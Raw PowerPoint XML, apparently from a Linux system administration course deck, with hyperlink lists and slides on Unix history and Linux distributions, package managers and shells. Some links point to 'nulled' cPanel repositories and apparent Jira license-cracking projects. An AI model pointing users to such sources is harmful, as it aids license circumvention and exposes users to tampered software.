Target="../media/image234.png"/></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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image225.png"/></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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image244.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image231.png"/></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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image230.png"/></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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image238.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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image264.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image228.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image236.png"/></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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image236.png"/></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3.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4.xml"/></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5.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6.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7.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8.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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/11kcKB7NP1243I6W4XjNZTpmkLh5nB4ScV5fBF8szb2c/edit?usp=sharing" TargetMode="Externa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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.axvoice.com/support/configuration/x-ten.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/asterisk/asterisk/blob/master/configs/samples/asterisk.conf.sample" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.atlantic.net/vps-hosting/how-to-install-asterisk-and-freepbx-on-ubuntu/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sangomakb.atlassian.net/wiki/spaces/FP/pages/230326391/FreePBX+17+Installation" TargetMode="Externa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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image235.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image239.png"/></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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image240.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image233.png"/></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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image261.png"/></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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image253.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/></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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developers.google.com/speed/public-dns/cache" TargetMode="Externa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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://intodns.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mxtoolbox.com/" TargetMode="Externa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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/licensenulled/cPanel-Nulled" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/></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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/></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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ftp.de.debian.org/debian" TargetMode="Externa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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20231124212850/https://github.com/tactu2023/cPanel-nulled" TargetMode="Externa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4.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5.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6.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.anildollor.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sunildollor.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.anildollor.com" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.anildollor.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.anildollor.com.conf" TargetMode="Externa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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.anildollor.com.crt" TargetMode="Externa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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://news.vishalmahawar.shop" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://news.vishalmahawar.shop" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://news.vishalmahawar.shop" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://news.vishalmahawar.shop" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.anildollor.com.con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unix.stackexchange.com/questions/3568/how-to-switch-between-users-on-one-terminal" TargetMode="Externa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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://news.vishalmahawar.shop" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://news.vishalmahawar.shop" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://news.vishalmahawar.shop" TargetMode="Externa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1.xml"/></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2.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.anildollor.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sunildollor.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vishal.com" TargetMode="External"/></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4.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cpanel.net/" TargetMode="Externa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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/></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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/></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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/></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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.godaddy.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hostgator.com" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://one.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unix.stackexchange.com/questions/3568/how-to-switch-between-users-on-one-terminal" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unix.stackexchange.com/questions/3568/how-to-switch-between-users-on-one-terminal" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unix.stackexchange.com/questions/3568/how-to-switch-between-users-on-one-terminal" TargetMode="Externa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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hetzner.com/" TargetMode="Externa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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image279.jpg"/></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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/></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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image246.jpg"/></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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image274.png"/></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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image245.jpg"/></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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.godaddy.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://contabo.com/en" TargetMode="Externa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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedns.centos-webpanel.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudflare.com/lp/pg-free-fast-secure-dns/" TargetMode="Externa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8.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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="about:blan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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image254.png"/></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1.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2.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3.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4.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5.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6.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7.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8.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www.amazon.in/Kingston-FURY-3200MHz-SODIMM-KF432S20IB/dp/B097TN561M/ref=sr_1_2_sspa?crid=LAKCLSUBS1D7&amp;keywords=kingston+fury+8gb+ddr4+3200&amp;qid=1690599032&amp;sprefix=kingston+fury+16gb+ddr4+3200%2Caps%2C197&amp;sr=8-2-spons&amp;sp_csd=d2lkZ2V0TmFtZT1zcF9hdGY&amp;psc=1" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.in/Western-Digital-Internal-500GBfor-Performance/dp/B09ZYPTXS4/ref=sr_1_3?keywords=ssd%2Bwd%2Bblue%2B500gb&amp;qid=1690599227&amp;sprefix=ssd%2Bwb%2Bblue%2Caps%2C206&amp;sr=8-3&amp;th=1"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6.jpg"/></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0.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1.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2.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3.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image257.png"/></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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image252.png"/></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6.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7.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8.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0.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1.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2.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3.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4.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5.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image241.jpg"/></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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image248.png"/></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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image247.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image242.png"/></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0.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1.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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://29aug.vishalmahawar.shop" TargetMode="Externa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3.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4.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5.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6.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7.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8.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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/default.asp" TargetMode="Externa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1.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ugoviti/izpbx/" TargetMode="Externa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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image268.png"/></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5.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image243.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image251.png"/></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7.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8.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0.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1.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3.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image266.jpg"/></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5.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6.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image233.png"/></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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.whmcs.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.whmcs.com/getting-started/system-requirements/" TargetMode="Externa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0.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1.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2.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hub.docker.com/r/linuxserver/code-server" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image282.png"/></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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image267.jpg"/></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5.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6.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7.xml"/></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8.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0.xml"/></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1.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2.xml"/></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3.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4.xml"/></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5.xml"/></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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://codecanyon.net/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://doniaweb.com/" TargetMode="Externa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7.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8.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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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4.pn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0.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1.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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image258.png"/></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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image256.png"/></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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image260.png"/></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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image262.png"/></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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image271.jpg"/></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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image263.jpg"/></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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image259.png"/></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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aleks-aleksandrov.medium.com/beginners-guide-to-zabbix-easy-steps-for-installation-and-configuration-39ed9a81e0c2" TargetMode="Externa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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image255.png"/></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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image270.png"/></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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image265.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image269.png"/></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4.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/anildalar/Jira-Working" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/TkachenkoSerg/Atlassian-Agent" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/haxqer/jira/tree/rm" TargetMode="Externa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6.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/soft84ya/bcdservices/tree/master" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bcdservices.com" TargetMode="Externa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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image277.jpg"/></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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kubernetes.io/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.png"/></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1.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2.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3.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4.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image281.png"/></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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image280.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/></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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image276.png"/></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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image275.jpg"/></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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kubernetes.io/docs/setup/best-practices/cluster-lar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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image278.png"/></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1.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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://praveendandu24.medium.com/kubernetes-tutorial-for-beginners-mastering-the-basics-in-1-hour-332db7b5916b" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@lumeilin301/kubernetes-tutorial-for-beginners-getting-started-with-container-orchestration-895a159abe1a" TargetMode="Externa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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27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www.npmjs.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pypi.org/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mvnrepository.com/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gradle.org/"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54.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId7"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nodejs.org/en" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nextjs.org/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://laravel.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.python.org/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.djangoproject.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ruby-lang.org/en/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rubyonrails.or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b="8368" l="0" r="1351" t="16239"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330237" y="1068000"/>
            <a:ext cx="6483527" cy="2735400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404250" y="3909875"/>
            <a:ext cx="8335500" cy="92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4800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>System Administration</a:t>
            </a:r>
            <a:endParaRPr sz="4700">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="101" name="Google Shape;101;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6968375" y="208000"/>
            <a:ext cx="1953916" cy="556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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450425" y="1359525"/>
            <a:ext cx="8520600" cy="2248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Unix is the grandfather of all operating systems today, except windows</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accen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124"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7560" l="3484" r="4085" t="7585"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="898525" y="183287"/>
            <a:ext cx="7025699" cy="47769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125"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2742" l="2108" r="2032" t="2037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1026575" y="231250"/>
            <a:ext cx="7405776" cy="48375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126"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="33332"/>
            <a:ext cx="9023601" cy="507684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7"/>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Linux Versions and Package Managers</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="719" name="Google Shape;719;p127"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="423850" y="1294775"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2079700"/>
                <a:gridCol w="2079700"/>
                <a:gridCol w="2079700"/>
                <a:gridCol w="2079700"/>
              </a:tblGrid>
              <a:tr h="609575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="274E13"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Version</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="274E13"/>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74E13"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Package Manager</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="274E13"/>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74E13"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Shell Terminal</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="274E13"/>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74E13"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Shell Access Command</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="274E13"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">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Ubuntu</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APT</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rgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Bourne Again Shell (bash) </a:t>
                      </a:r>
                      <a:endParaRPr sz="12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/bin/bash</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>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CentOs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YUM</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rgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Bourne Again Shell (bash)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/bin/bash</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>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rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>ALPINE</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APK</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200">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Bourne Shell (sh) </a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>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/bin/sh</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397075" y="249700"/>
